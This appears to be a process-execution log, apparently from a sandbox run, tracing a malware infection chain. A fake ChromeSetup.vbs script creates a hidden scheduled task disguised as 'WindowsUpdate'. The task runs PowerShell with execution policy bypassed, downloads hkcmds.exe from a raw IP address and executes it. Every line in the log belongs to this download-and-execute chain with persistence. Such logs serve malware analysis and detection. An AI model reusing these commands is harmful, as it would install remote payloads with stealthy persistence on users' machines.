wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\ChromeSetup.vbs
2556schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://104.168.46.25/890/oj/hkcmds.exe -o C:\Windows\Temp\hkcmd.exe;Start-Process powershell.exe C:\Windows\Temp\hkcmd.exe -NoNewWindow
2636powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://104.168.46.25/890/oj/hkcmds.exe -o C:\Windows\Temp\hkcmd.exe; Start-Process powershell.exe C:\Windows\Temp\hkcmd.exe -NoNewWindow }"
2692curl.exe "C:\util\curl\curl.exe" http://104.168.46.25/890/oj/hkcmds.exe -o C:\Windows\Temp\hkcmd.exe
2836powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\Temp\hkcmd.exe
2900hkcmd.exe "C:\Windows\Temp\hkcmd.exe"
2980